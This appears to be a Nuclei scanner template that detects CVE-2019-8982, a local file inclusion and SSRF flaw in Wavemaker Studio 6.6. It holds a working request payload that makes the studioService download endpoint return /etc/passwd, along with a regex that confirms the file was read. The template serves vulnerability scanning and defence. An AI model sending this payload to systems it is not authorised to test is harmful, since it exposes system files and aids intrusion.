id: CVE-2019-8982 info: name: Wavemaker Studio 6.6 LFI/SSRF author: madrobot severity: high tags: cve,cve2019,wavemaker,lfi,ssrf requests: - method: GET path: - "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body